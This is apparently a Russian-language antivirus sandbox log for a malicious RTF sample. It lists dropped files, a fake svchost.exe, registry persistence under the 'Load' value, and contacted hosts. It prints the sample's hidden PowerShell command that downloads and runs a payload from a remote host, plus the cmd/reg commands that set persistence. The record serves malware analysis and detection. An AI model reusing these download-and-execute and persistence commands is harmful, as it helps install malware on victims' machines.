Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%ALLUSERSPROFILE%\svchost.exe'
- http://kq#.ugo.si/svchost.exe как %appdata%\svchost.exe
- %WINDIR%\syswow64\cmd.exe
- svchost.exe
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\svchost.exe
- <Текущая директория>\~wrd0000.tmp
- %ALLUSERSPROFILE%\svchost.exe
- %TEMP%\abdtfhghgdghghœ.sct
- <PATH_SAMPLE>.rtf
- 'kq#.ugo.si':80
- 'by#.z86.ru':5200
- DNS ASK kq#.ugo.si
- DNS ASK by#.z86.ru
- '%APPDATA%\svchost.exe'
- '%ALLUSERSPROFILE%\svchost.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kq#.ugo.si/svchost.exe','%APPDATA%\svchost.exe');Start-Process '%APPDA...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"
- '%WINDIR%\syswow64\cmd.exe'